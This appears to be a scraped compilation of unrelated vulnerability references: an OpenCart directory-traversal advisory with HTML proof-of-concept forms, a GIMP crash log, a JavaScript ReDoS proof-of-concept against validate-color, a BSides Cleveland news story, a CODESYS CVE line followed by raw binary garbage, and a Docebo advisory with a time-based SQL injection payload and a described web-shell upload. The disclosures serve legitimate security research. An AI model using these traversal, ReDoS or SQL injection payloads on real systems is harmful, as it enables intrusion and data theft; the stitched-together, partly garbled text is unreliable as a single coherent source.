In OpenCart 1.4.7 to 1.5.5.1, implemented anti-traversal code in filemanager.php is ineffective and can be bypassed.

Nmap Announce Nmap Dev Full Disclosure Security Lists Internet Issues Open Source Dev

**Full Disclosure mailing list archives**

_From_: Janek Vind <come2waraxe () yahoo com>  
_Date_: Tue, 19 Mar 2013 09:21:51 -0700 (PDT)  

\[waraxe-2013-SA#098\] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1
===============================================================================

Author: Janek Vind "waraxe"
Date: 19. March 2013
Location: Estonia, Tartu
Web: http://www.waraxe.us/advisory-98.html

Description of vulnerable software:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

OpenCart is a turn-key ready "out of the box" shopping cart solution.
You simply install, select your template, add products and your ready to start
accepting orders.

http://www.opencart.com/

Affected are all OpenCart versions, from 1.4.7 to 1.5.5.1, maybe older too.

###############################################################################
1. Directory Traversal Vulnerabilities in "filemanager.php"
###############################################################################

Reason: insufficient sanitization of user-supplied data
Attack vectors:
 1. user-supplied POST parameters "directory", "name", "path", "from", "to"
Preconditions:
 1. Logged in as admin with filemanager access privileges
 
Script "filemanager.php" offers for OpenCart admins various file related services:
directory listing and creation, image file listing, file copy/move/unlink, upload,
image resize. By the design OpenCart admin can manage files and directories only
inside specific subdirectory "image/data/". It means, that even if you have
OpenCart admin privileges, you still are not suppose to get access to the files
and directories below "image/data/". So far, so good.
But what about directory traversal? Let's have a look at the source code.

PHP script "admin/controller/common/filemanager.php" line 66:
------------------------\[ source code start \]----------------------------------
public function directory() {    
    $json = array();
    
    if (isset($this->request->post\['directory'\])) {
        $directories = glob(rtrim(DIR\_IMAGE . 'data/' . 
           str\_replace('../', '', $this->request->post\['directory'\]), '/') . 
           '/\*', GLOB\_ONLYDIR); 
        
        if ($directories) {
            $i = 0;
        
            foreach ($directories as $directory) {
                $json\[$i\]\['data'\] = basename($directory);
                $json\[$i\]\['attributes'\]\['directory'\] = 
                   utf8\_substr($directory, strlen(DIR\_IMAGE . 'data/'));
...
    
    $this->response->setOutput(json\_encode($json));
------------------------\[ source code end \]------------------------------------

We can see, that directory traversal is prevented by removing "../" substrings
from user submitted parameters. At first look this seems to be secure enough -
if we can't use "../", then directory traversal is impossible, right?
Deeper analysis shows couple of shortcomings in specific filtering method.
First problem - if OpenCart is hosted on Windows platform, then it's possible
to use "..\\" substring for directory traversal.

Test (parameter "token" must be valid):
-------------------------\[ test code start \]-----------------------------------
<html><body><center>
<form 
action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25";
 method="post">
<input type="hidden" name="directory" value="..\\..\\..\\">
<input type="submit" value="Test">
</form>
</center></body></html>
--------------------------\[ test code end \]------------------------------------

Server response is in JSON format and contains listing of subdirectories outside
of OpenCart main directory.

Second problem - filtering with "str\_replace" can be tricked by using custom
strings. If we use "..././" substring, then after filtering in becomes "../".
So it appears, that implemented anti-traversal code is ineffective and can
be bypassed.

Test (parameter "token" must be valid):
-------------------------\[ test code start \]-----------------------------------
<html><body><center>
<form 
action="http://localhost/oc1551/admin/index.php?route=common/filemanager/directory&token=92aa6ac32b4c8e7a175c3dc9f7754d25";
 method="post">
<input type="hidden" name="directory" value="..././..././..././..././">
<input type="submit" value="Test">
</form>
</center></body></html>
--------------------------\[ test code end \]------------------------------------

Server response is exactly same as in previous test - information about directory
structure outside of OpenCart main directory has been disclosed.

PHP script "filemanager.php" contains 14 uses of "str\_replace('../', ''," code.
Most of the public functions in "filemanager.php" are affected by directory
traversal vulnerability:

public function directory() -> listing of subdirectories
public function files() -> listing of image files
public function create() -> creation of new directories
public function delete() -> deletion of arbitrary files and directories
public function move() -> renaming of files or directories
public function copy() -> copying of files or directories
public function rename() -> renaming of files or directories
public function upload() -> uploading of image or flash files



Contact:
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

come2waraxe () yahoo com
Janek Vind "waraxe"

Waraxe forum:  http://www.waraxe.us/forums.html
Personal homepage: http://www.janekvind.com/
Random project: http://albumnow.com/
---------------------------------- \[ EOF \] ------------------------------------

\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_\_
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

**Current thread:**

*   **\[waraxe-2013-SA#098\] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1** _Janek Vind (Mar 19)_

CVE-2013-1891: Full Disclosure: [waraxe-2013-SA#098] - Directory Traversal Vulnerabilities in OpenCart 1.5.5.1

An issue in gimp_layer_invalidate_boundary of GNOME GIMP 2.10.30 allows attackers to trigger an unhandled exception via a crafted XCF file, causing a Denial of Service (DoS).

    GNU Image Manipulation Program version 2.10.30
    git-describe: Unknown, shouldn't happen
    Build: org.gimp.GIMP_official rev 0 for windows
    # C compiler #
    	Using built-in specs.
    	COLLECT_GCC=W:\msys64-gtk2\mingw64\bin\gcc.exe
    	COLLECT_LTO_WRAPPER=W:/msys64-gtk2/mingw64/bin/../lib/gcc/x86_64-w64-mingw32/11.2.0/lto-wrapper.exe
    	Target: x86_64-w64-mingw32
    	Configured with: ../gcc-11.2.0/configure --prefix=/mingw64 --with-local-prefix=/mingw64/local --build=x86_64-w64-mingw32 --host=x86_64-w64-mingw32 --target=x86_64-w64-mingw32 --with-native-system-header-dir=/mingw64/x86_64-w64-mingw32/include --libexecdir=/mingw64/lib --enable-bootstrap --enable-checking=release --with-arch=x86-64 --with-tune=generic --enable-languages=c,lto,c++,fortran,ada,objc,obj-c++,jit --enable-shared --enable-static --enable-libatomic --enable-threads=posix --enable-graphite --enable-fully-dynamic-string --enable-libstdcxx-filesystem-ts --enable-libstdcxx-time --disable-libstdcxx-pch --disable-libstdcxx-debug --enable-lto --enable-libgomp --disable-multilib --disable-rpath --disable-win32-registry --disable-nls --disable-werror --disable-symvers --with-libiconv --with-system-zlib --with-gmp=/mingw64 --with-mpfr=/mingw64 --with-mpc=/mingw64 --with-isl=/mingw64 --with-pkgversion='Rev5, Built by MSYS2 project' --with-bugurl=https://github.com/msys2/MINGW-packages/issues --with-gnu-as --with-gnu-ld --with-boot-ldflags='-pipe -Wl,--dynamicbase,--high-entropy-va,--nxcompat,--default-image-base-high -Wl,--disable-dynamicbase -static-libstdc++ -static-libgcc' 'LDFLAGS_FOR_TARGET=-pipe -Wl,--dynamicbase,--high-entropy-va,--nxcompat,--default-image-base-high' --enable-linker-plugin-flags='LDFLAGS=-static-libstdc++\ -static-libgcc\ -pipe\ -Wl,--dynamicbase,--high-entropy-va,--nxcompat,--default-image-base-high\ -Wl,--stack,12582912'
    	Thread model: posix
    	Supported LTO compression algorithms: zlib zstd
    	gcc version 11.2.0 (Rev5, Built by MSYS2 project) 
    
    # Libraries #
    using babl version 0.1.88 (compiled against version 0.1.88)
    using GEGL version 0.4.34 (compiled against version 0.4.34)
    using GLib version 2.70.2 (compiled against version 2.70.2)
    using GdkPixbuf version 2.42.6 (compiled against version 2.42.6)
    using GTK+ version 2.24.33 (compiled against version 2.24.33)
    using Pango version 1.50.2 (compiled against version 1.50.2)
    using Fontconfig version 2.13.94 (compiled against version 2.13.94)
    using Cairo version 1.17.4 (compiled against version 1.17.4)
    

    -------------------
    
    Error occurred on Friday, June 3, 2022 at 15:37:43.
    
    gimp-2.10.exe caused an Access Violation at location 00007FF692DE9E5C in module gimp-2.10.exe Writing to location 000000000000008C.
    
    AddrPC           Params
    00007FF692DE9E5C 000001C7F701D540 00007FF692DB3D5F 000001C700000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692DB55A4 000001C7F5B001D0 0000007EBE1FEE90 000001C700000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692DB6B74 0000007EBE1FEF52 00007FF6931F7610 0000000000000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692C83BCF 000001C7EBD2D290 00007FFBB6D653A6 0000000000000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692C7F340 000001C7EBDC8310 000001C7F663A430 000001C7B1B27370  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692C7F4F9 000001C7EBDC8810 000001C7F4594560 0000000000000001  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692D21BE0 000001C7EBEC7240 000001C7EBEF50B0 000001C700000003  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692D14FF9 0000000000000003 00007FF692D14AF4 0000000000000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692D0E43C 0000000000000000 0000000000000020 000001C7F7156780  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692D0E8B7 000001C7EBE70C80 000001C7EBECA230 000001C7F663A430  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692E304A4 0000000000000000 0000000000000000 000001C7F663A430  gimp-2.10.exe!gimp_core_pixbufs_get_resource
    00007FF692DDA679 000001C7EBD2D290 0000000000000000 0000000000000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692DDA785 000001C7F7021760 000001C7F7043F10 000001C7F65BC168  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FF692C4AE7C 000001C7B3B79860 00007FFBB6B5BB20 0000000000000000  gimp-2.10.exe!gimp_tool_cursors_get_resource
    00007FFBB6B58D47 000001C700000000 0000007EBE1FF688 000001C7B3B26870  libglib-2.0-0.dll!g_clear_list
    00007FFBB6B5BEDE 0000000000000000 0000000000000000 000001C7EBD2D290  libglib-2.0-0.dll!g_main_context_check
    00007FFBB6B5C3FC 0000000000000000 0000000000000000 0000000000000000  libglib-2.0-0.dll!g_main_loop_run
    00007FF692A31A2B 00007FFC2C7093B0 000001C7B1B4E480 000001C7B1C00860  gimp-2.10.exe!0x7ff600001a2b
    00007FF692ECF67F 0000000000000000 000001C7B1B50E60 0000000000000000  gimp-2.10.exe!gimp_core_pixbufs_get_resource
    00007FF692A313B1 0000000000000000 0000000000000000 0000000000000000  gimp-2.10.exe!0x7ff6000013b1
    00007FF692A314C6 0000000000000000 0000000000000000 0000000000000000  gimp-2.10.exe!0x7ff6000014c6
    00007FFC2C7054E0 0000000000000000 0000000000000000 0000000000000000  KERNEL32.DLL!BaseThreadInitThunk
    00007FFC2E80485B 0000000000000000 0000000000000000 0000000000000000  ntdll.dll!RtlUserThreadStart
    
    gimp-2.10.exe	2.10.30.0
    ntdll.dll   	10.0.22000.653
    KERNEL32.DLL	10.0.22000.675
    KERNELBASE.dll	10.0.22000.675
    msvcrt.dll  	7.0.22000.1
    ole32.dll   	10.0.22000.120
    msvcp_win.dll	10.0.22000.1
    ucrtbase.dll	10.0.22000.1
    GDI32.dll   	10.0.22000.1
    win32u.dll  	10.0.22000.675
    gdi32full.dll	10.0.22000.675
    USER32.dll  	10.0.22000.282
    combase.dll 	10.0.22000.653
    RPCRT4.dll  	10.0.22000.675
    SHELL32.dll 	10.0.22000.593
    libgimpmodule-2.0-0.dll
    libgimpcolor-2.0-0.dll
    libgimpmath-2.0-0.dll
    libgimpconfig-2.0-0.dll
    libgimpthumb-2.0-0.dll
    libgimpwidgets-2.0-0.dll
    libgimpbase-2.0-0.dll
    exchndl.dll 	0.8.2.0
    PSAPI.DLL   	10.0.22000.1
    libbabl-0.1-0.dll
    libcairo-2.dll
    dbghelp.dll 	6.3.9600.17298
    libfontconfig-1.dll
    libgdk_pixbuf-2.0-0.dll	2.42.6.0
    libfreetype-6.dll	2.11.1.0
    ADVAPI32.dll	10.0.22000.653
    sechost.dll 	10.0.22000.556
    libgexiv2-2.dll
    libgio-2.0-0.dll	2.70.2.0
    libgobject-2.0-0.dll	2.70.2.0
    libglib-2.0-0.dll	2.70.2.0
    SHLWAPI.dll 	10.0.22000.1
    WS2_32.dll  	10.0.22000.1
    libharfbuzz-0.dll
    libintl-8.dll	0.19.8.0
    libjson-glib-1.0-0.dll
    liblcms2-2.dll
    libmypaint-0.dll
    libpangoft2-1.0-0.dll	1.50.2.0
    libpango-1.0-0.dll	1.50.2.0
    libpangocairo-1.0-0.dll	1.50.2.0
    zlib1.dll
    libgdk-win32-2.0-0.dll	2.24.33.0
    libgegl-0.4-0.dll
    libgegl-npd-0.4.dll
    libgtk-win32-2.0-0.dll	2.24.33.0
    IMM32.dll   	10.0.22000.1
    libgmodule-2.0-0.dll	2.70.2.0
    mscms.dll   	10.0.22000.469
    comdlg32.dll	10.0.22000.527
    VERSION.dll 	10.0.22000.1
    shcore.dll  	10.0.22000.613
    MSIMG32.dll 	10.0.22000.1
    mgwhelp.dll 	0.8.2.0
    libgcc_s_seh-1.dll
    libpixman-1-0.dll
    libexpat-1.dll
    libpng16-16.dll
    libiconv-2.dll	1.16.0.0
    gdiplus.dll 	10.0.22000.675
    libbz2-1.dll
    libbrotlidec.dll
    libstdc++-6.dll
    libffi-7.dll
    DNSAPI.dll  	10.0.22000.653
    IPHLPAPI.DLL	10.0.22000.282
    USP10.dll   	10.0.22000.1
    libexiv2.dll
    libwinpthread-1.dll	1.0.0.0
    libpcre-1.dll
    libgraphite2.dll
    libjson-c-5.dll
    libpangowin32-1.0-0.dll	1.50.2.0
    libfribidi-0.dll
    libthai-0.dll
    COMCTL32.dll	5.82.22000.1
    bcrypt.dll  	10.0.22000.1
    cfgmgr32.dll	10.0.22000.1
    WINSPOOL.DRV	10.0.22000.675
    libatk-1.0-0.dll	2.36.0.0
    libbrotlicommon.dll
    libcurl-4.dll
    CRYPT32.dll 	10.0.22000.348
    WLDAP32.dll 	10.0.22000.675
    libdatrie-1.dll
    libnghttp2-14.dll
    libidn2-0.dll
    libcrypto-1_1-x64.dll	1.1.1.12
    libpsl-5.dll
    libssh2-1.dll
    libssl-1_1-x64.dll	1.1.1.12
    libzstd.dll
    libunistring-2.dll	0.9.10.0
    NSI.dll     	10.0.22000.1
    windows.storage.dll	10.0.22000.675
    wintypes.dll	10.0.22000.527
    kernel.appcore.dll	10.0.22000.71
    bcryptPrimitives.dll	10.0.22000.376
    uxtheme.dll 	10.0.22000.120
    MSCTF.dll   	10.0.22000.527
    avx2-int8.dll
    cairo.dll
    CIE.dll
    double.dll
    fast-float.dll
    float.dll
    gegl-fixups.dll
    gggl-lies.dll
    gggl-table-lies.dll
    gggl-table.dll
    gggl.dll
    gimp-8bit.dll
    grey.dll
    half.dll
    HCY.dll
    HSL.dll
    HSV.dll
    naive-CMYK.dll
    simple.dll
    sse-half.dll
    sse2-float.dll
    sse2-int16.dll
    sse2-int8.dll
    sse4-int8.dll
    two-table.dll
    u16.dll
    u32.dll
    ycbcr.dll
    gegl-core.dll
    profapi.dll 	10.0.22000.1
    OLEAUT32.dll	10.0.22000.1
    clbcatq.dll 	2001.12.10941.16384
    propsys.dll 	7.0.22000.37
    apphelp.dll 	10.0.22000.282
    NetworkExplorer.dll	10.0.22000.51
    winhttp.dll 	10.0.22000.1
    exr-load.dll
    libIlmImf-2_5.dll
    libIex-2_5.dll
    libHalf-2_5.dll
    libIlmThread-2_5.dll
    libImath-2_5.dll
    gegl-common-gpl3.dll
    gegl-common.dll
    gif-load.dll
    jp2-load.dll
    libjasper-4.dll
    libjpeg-8.dll
    jpg-load.dll
    pdf-load.dll
    libpoppler-glib-8.dll
    libpoppler-115.dll
    nss3.dll    	3.73.1.0
    libnspr4.dll	4.31.0.0
    libplc4.dll 	4.31.0.0
    smime3.dll  	3.73.1.0
    libopenjp2-7.dll
    libtiff-5.dll
    libplds4.dll	4.31.0.0
    nssutil3.dll	3.73.1.0
    MSWSOCK.dll 	10.0.22000.1
    WINMM.dll   	10.0.22000.1
    libjbig-0.dll
    libdeflate.dll
    libLerc.dll
    liblzma-5.dll	5.2.5.0
    libwebp-7.dll
    pixbuf-load.dll
    png-load.dll
    ppm-load.dll
    raw-load.dll
    libraw-20.dll
    libgomp-1.dll
    rgbe-load.dll
    svg-load.dll
    librsvg-2-2.dll
    libcairo-gobject-2.dll
    USERENV.dll 	10.0.22000.1
    libxml2-2.dll
    text.dll
    tiff-load.dll
    webp-load.dll
    exr-save.dll
    jpg-save.dll
    npy-save.dll
    pixbuf-save.dll
    png-save.dll
    ppm-save.dll
    rgbe-save.dll
    sdl2-display.dll
    SDL2.dll    	2.0.18.0
    SETUPAPI.dll	10.0.22000.469
    tiff-save.dll
    webp-save.dll
    gegl-common-cxx.dll
    lcms-from-profile.dll
    npd.dll
    path.dll
    transformops.dll
    vector-stroke.dll
    seamless-clone-compose.dll
    gegl-generated.dll
    matting-levin.dll
    libumfpack.dll
    libamd.dll
    libsuitesparseconfig.dll
    libcholmod.dll
    libcamd.dll
    libccolamd.dll
    libmetis.dll
    libcolamd.dll
    libopenblas.dll
    libgfortran-5.dll
    libquadmath-0.dll
    seamless-clone.dll
    libgegl-sc-0.4.dll
    libwimp.dll
    libpixmap.dll
    libpixbufloader-png.dll
    libpixbufloader-svg.dll
    icm32.dll   	10.0.22000.469
    textinputframework.dll	10.0.22000.282
    CoreMessaging.dll	10.0.22000.71
    CoreUIComponents.dll	10.0.22000.132
    CRYPTBASE.DLL	10.0.22000.1
    PalmInputTSF.dll	2.7.0.1702
    ntmarta.dll 	10.0.22000.1
    AppXDeploymentClient.dll	10.0.22000.469
    urlmon.dll  	11.0.22000.653
    iertutil.dll	11.0.22000.653
    netutils.dll	10.0.22000.434
    srvcli.dll  	10.0.22000.613
    TextShaping.dll
    Windows.ApplicationModel.dll	10.0.22000.593
    mssprxy.dll 	7.0.22000.593
    mrmcorer.dll	10.0.22000.120
    windows.staterepositorycore.dll	10.0.22000.65
    windows.staterepositoryclient.dll	10.0.22000.653
    bcp47mrm.dll	10.0.22000.65
    Windows.UI.dll	10.0.22000.1
    CRYPTSP.dll 	10.0.22000.1
    rsaenh.dll  	10.0.22000.282
    shfolder.dll	10.0.22000.1
    webio.dll   	10.0.22000.1
    WINNSI.DLL  	10.0.22000.1
    SspiCli.dll 	10.0.22000.556
    rasadhlp.dll	10.0.22000.1
    fwpuclnt.dll	10.0.22000.593
    schannel.DLL	10.0.22000.675
    mskeyprotect.dll	10.0.22000.1
    NTASN1.dll  	10.0.22000.1
    ncrypt.dll  	10.0.22000.1
    ncryptsslp.dll	10.0.22000.1
    MSASN1.dll  	10.0.22000.1
    DPAPI.DLL   	10.0.22000.1
    comctl32.dll	6.10.22000.120
    WindowsCodecs.dll	10.0.22000.653
    
    Windows 10.0.22000
    DrMingw 0.8.2

CVE-2022-32990: Trigger a unhandled exception in GIMP 2.10.30 (#8230) · Issues · GNOME / GIMP

A Regular Expression Denial of Service (ReDOS) vulnerability was discovered in validate-color v2.1.0 when handling crafted invalid rgb(a) strings.

Permalink

Cannot retrieve contributors at this time

/\*\*

\* validate-color@2.1.0

\* Package Manager: npm

\* Link to published package: https://github.com/dreamyguy/validate-color

\* Link to GitHub repo: https://github.com/dreamyguy/validate-color

\* Severity level: High

\* Module Description: Validate HTML colors by 'name', 'special name', 'hex', 'rgb', 'rgba', 'hsl', 'hsla', 'hwb' or 'lab' values

\* Additional Info: It allows cause a denial of service when handling crafted invalid rgb(a) strings.

\* Contacted maintainer?: No

\* Open issue?: No

\*/

require("react/package.json"); // react is a peer dependency.

require("react-dom/package.json"); // react-dom is a peer dependency.

var validateColor \= require("validate-color")

function build\_blank(n) {

var ret \= "rgb(0"

for (var i \= 0; i < n; i++) {

ret += " "

}

return ret + "!";

}

//validateColor.validateHTMLColorRgb('rgb(0 0 0)')

for(var i \= 1; i <= 5000000; i++) {

if (i % 100 \== 0) {

var time \= Date.now();

var attack\_str \= build\_blank(i)

validateColor.validateHTMLColorRgb(attack\_str)

var time\_cost \= Date.now() \- time;

console.log("attack\_str.length: " + attack\_str.length + ": " + time\_cost+" ms")

}

}

CVE-2021-40892: SaveResults/validate-color.js at main · yetingli/SaveResults

Fury among online community over decision to include presenter

Fury among online community over decision to include presenter

The organizer of BSides Cleveland has stepped down after an online backlash that followed a controversial figure being invited to speak as a “surprise”.

The annual infosec conference, held last weekend (June 17-18), saw a handful of speakers walk out in protest over the appearance of social engineering expert Chris Hadnagy.

Hadnagy is a controversial figure in the hacking community and has previously been banned from DEF CON, the iconic hacking conference, due to allegations he violated the event’s code of conduct.

He had been added to the bill to speak as a ‘special guest’ on day two of the conference. However, when other community members found out he was appearing, the backlash prompted some speakers to abandon their presentations.

Read more of the latest news from the infosec community

John Strand, known online as ‘strandjs’, was due to present a talk but announced on Twitter that he would instead be leaving the event, writing online that the situation “sucks”.

Dave Kennedy, who was also scheduled to speak, echoed Strand’s thoughts, concluding it was “the right decision to pull it”. 

Rockie Brockway, BSides Cleveland organizer, has since released a statement taking responsibility for the incident and announcing that he is stepping down from the role.

Brockway posted online (non-HTTPS link): “The decision to include Chris Hadnagy in the 2022 BSidesCleveland event was my decision. Furthermore, the decision to keep the opening speaker slot as Special Guest instead of naming Chris specifically was also my decision.

“I am apologizing to everyone that my decisions harmed, whether strangers, family, sponsors, or friends, and I am deeply sorry for that. I understand that my decisions may have destroyed the trust that I have built over my years in the BSides community, and I accept accountability for my actions.

“Effective immediately I resign from BSidesCLE leadership.”

**New direction**

The founders of Security BSides, which does not organize local chapter events such as BSides Cleveland, have since issued a call for volunteers to step forward as new organizers.

It read: “Is it possible to host controversial speakers at a BSides conference? Absolutely, but there’s a right way to go about it.

“Organizers should discuss among themselves. They should seek input from their community. The details of the controversy should be considered, including both the benefits and drawbacks of allowing a controversial figure to speak.

“All volunteers, sponsors, and attendees should be notified and given ample time to decide whether to participate.”

**Statement**

Chris Hadnagy told The Daily Swig in response: “I do want to apologize to anyone who was confused or upset by the lack of advance notice about my appearance. This was simply an oversight and not done deliberately.

“The organizers of BSides Cleveland do not deserve the level of criticism they have received, a lot of which appears to be from people who weren’t even at the conference. I hope people will understand that the BSides organizers are good, hardworking people who volunteered their time to put on a great conference that tried to cover many important issues in our field. They had no ill-intent. Neither did I.

“I really do hope that we can reach a point in our industry – and society at large – where we can have open and honest conversations again, and a willingness to hear from both sides of an issue, before immediately deciding the worst about someone and reverting to online attacks and shaming.

“I have faced criticism for the last few months over a murky decision made by DEF CON that has never been properly explained by them. This has caused me, my family, my colleagues, and my friends a great deal of harm.

“I am not guilty of any crimes, but I am being treated like a criminal by some in the infosec community. I am very sorry for any trouble that my appearance this weekend caused to BSides, the other speakers, the attendees, and the sponsors.”

YOU MAY ALSO LIKE Security researcher receives legal threat over patched Powertek data center vulnerabilities

BSides Cleveland organizer steps down after controversial guest added as ‘surprise’ speaker

In CODESYS V2 PLCWinNT and Runtime Toolkit 32 in versions prior to V2.4.7.57 password protection is not enabled by default and there is no information or prompt to enable password protection at login in case no password is set at the controller.

\>\`>�>�?!?a?�?�@#@d@�@�A)AjA�A�B0BrB�B�C:C}C�DDGD�D�EEUE�E�F"FgF�F�G5G{G�HHKH�H�IIcI�I�J7J}J�KKSK�K�L\*LrL�MMJM�M�N%NnN�OOIO�O�P'PqP�QQPQ�Q�R1R|R�SS\_S�S�TBT�T�U(UuU�VV\\V�V�WDW�W�X/X}X�YYiY�ZZVZ�Z�\[E\[�\[�\\5\\�\\�\]'\]x\]�^^l^�\_\_a\_�\`\`W\`�\`�aOa�a�bIb�b�cCc�c�d@d�d�e=e�e�f=f�f�g=g�g�h?h�h�iCi�i�jHj�j�kOk�k�lWl�mm\`m�nnkn�ooxo�p+p�p�q:q�q�rKr�ss\]s�ttpt�u(u�u�v>v�v�wVw�xxnx�y\*y�y�zFz�{{c{�|!|�|�}A}�~~b~�#��G��� �k�͂0����W�������G����r�ׇ;����i�Ή3�����d�ʋ0�����c�ʍ1�����f�Ώ6����n�֑?����z��M��� �����\_�ɖ4��� �u���L���$�����h�՛B��������d�Ҟ@��������i�ءG���&����v��V�ǥ8��������n��R�ĩ7�������u��\\�ЭD���-�������u��\`�ֲK�³8���%�������y��h��Y�ѹJ�º;���.���!������ �����z���p���g���\_���X���Q���K���F���Aǿ�=ȼ�:ɹ�8ʷ�6˶�5̵�5͵�6ζ�7ϸ�9к�<Ѿ�?���D���I���N���U���\\���d���l���v��ۀ�܊�ݖ�ޢ�)߯�6��D���S���c���s���� ����2��F���\[���p������(��@���X���r������4���P���m��������8���W���w����)���K���m����C    $.' ",#(7),01444'9=82<.342��C  2!!22222222222222222222222222222222222222222222222222��c"�� ���}!1AQa"q2���#B��R��$3br� %&'()\*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������� ���w!1AQaq"2�B���� #3R�br� $4�%�&'()\*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz��������������������������������������������������������������������������?�J(�� (�� (�� (��t���A�66t�����������?���8������\`Q\[���/�������G�#��?'�������������?���8������\`Q\[���/�������G�#��?'�������������?���8������\`Q\[���/�������G�#��?'�������������?����i���Q!}���� 4QEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQEQE���g��k�������=!��k��Z(�� (�� (�� (�� (�� (�� �I�5��V����1��sf=U��e�M^��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��(��+����H��\*�k����H��\*��(�����8�ˉDi�d��r��Lr�Q������:K��mb2O"ƃ��o�U�,c����?ƹ�o.'b�J�g�s�L�?C��O��:h\[��Q�R�7� �\\d�������S�H{9�O��5Ƙ0d�����z'������@�Epz����fi�RC��l

CVE-2022-31806

** UNSUPPORTED WHEN ASSIGNED ** Docebo Community Edition v4.0.5 and below was discovered to contain a SQL injection vulnerability. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.

**Product description**

Swascan Offensive Security Team has identified multiple vulnerabilities on **Docebo Community Edition 4.0.5**, an open source e-learning platform also defined as Learning Management System.

**Technical summary**

Swascan’s Cyber Security Team discovered important vulnerabilities on Docebo CE <= v.4.0.5

**Vulnerability**

**CVSS 3.1**

**Docebo CE <= 4.0.5 – SQL Injection (unauthenticated)**

**8.6 – High  
**\[AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:L\]

**Docebo CE <= 4.0.5 – Arbitrary File Upload (Authenticated)**

**8.8 – High  
**\[AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\]

In the following section the technical details about this vulnerability, including evidence and a proof-of-concept. This vulnerability can affect hundred applications.

**Exploiting Docebo 4.0.5 Community Edition**

Due to an unauthenticated SQL Injection and an authenticated Abitrary File Upload, it’s possible to gain a Remote Command Execution upon Docebo 4.0.5 Community Edition.

**Unauthenticated SQL Injection**

The application is vulnerable to unauthenticated SQL Injection attacks.

A remote unauthenticated attacker could exploit this vulnerability in order to access to the application DataBase. Once exploited, the attacker can exfiltrate or overwrite  all the data within.

However, to exploit this vulnerability, the attacker needs to perform a large amount of HTTP request retrieving one character at a time.

Evidence 1 – Docebo Community Edition 4.0.5 – changelog.txt

The following figures show the evidences of the vulnerability and how it can be exploited. The Time-Based (Blind) technique has been used performing several HTTP requests and comparing the response time deelay.

Payload to verify:

    test+AND+(SELECT+1+FROM(SELECT(SLEEP(5)))a)

This specific payload works for MySQL database >= 5.0.12.

Evidence 2 – SQL Injection detection – payload to verify

Evidence 3 – SQL Injection Time Based – 5 seconds delay

The time delay of 5 seconds confirms the vulnerability due to the SQL command injected **SLEEEP(5)**.

The exploitation of this vulnerability doesn’t require any type of authentication.

Performing this attack, it’s possible to exfiltrate the users credentials (hashed) and, if cracked, log into the application.

Evidence 5 – User and Database name

Evidence 6 – Hashed credentials

**Remediation**

Review the validation logic of the information entered by the user so that a correct control of the input parameters is carried out using one or more of the following programming techniques:

*   Use of Prepared Statements (parameterized queries);
*   Use of Stored Procedures;
*   Validation and escaping of all user inputs that are used as query parameters;

It is also recommended to carry out the same checks in a timely manner on all queries made to the database since the same vulnerability may be present in many other points of the application than those reported.

**Authenticated Arbitrary File Upload**

After gaining an access to the application, an attacker could upload malicious files which could lead to arbitrary command execution on the remote server. The attacker could also use this vulnerability to upload a large file that may result in a Denial of Service (DoS).

It is shown below how it was possible to take advantage of the features of the application to upload a web shell written in **php** to the server.

To obtain this result the steps are the following:

1.  Access to the avatar upload function
2.  Append php code inside the field “up\_avatar”
3.  URL identification for webshell
4.  Execution of arbitrary commands

The process is described by the following evidences:

Evidence 7 – HTTP Request to upload user avatar and payload injected in the field up\_avatar

Evidence 8 – HTTP Response and identification of the URL to access to the webshell

Evidence 9 – Execution of arbitrary commands using the webshell uploaded in the previous step

**Remediation**

It is recommended to:

• Review the input validation of the file upload function, specifically, it is necessary to allow only the upload of file types functional to the business logic (for example, only images, PDF documents, etc …) through a whitelisting type filter (possibility of uploading only authorized file types);

• Block and notify the system administrator of the loading of the remaining types of files that could be interpreted and executed by the Web Server such as, for example, PHP, ASP, ASPX, JSP, etc …

For more details, refer to the user language and framework documentation and the OWASP SDLC guidelines.

**Sources and references**

  
https://www.owasp.org/index.php/SQL\_Injection

https://cwe.mitre.org/data/definitions/89.html

https://github.com/OWASP/CheatSheetSeries/blob/master/cheatsheets/SQL\_Injection\_Prevention\_Cheat\_Sheet.md

https://owasp.org/Top10/A03\_2021-Injection/

https://docs.microsoft.com/it-it/dotnet/standard/security/secure-coding-guidelines

https://cwe.mitre.org/data/definitions/434.html

https://cheatsheetseries.owasp.org/cheatsheets/DotNet\_Security\_Cheat\_Sheet.html

https://owasp.org/Top10/it/A04\_2021-Insecure\_Design/

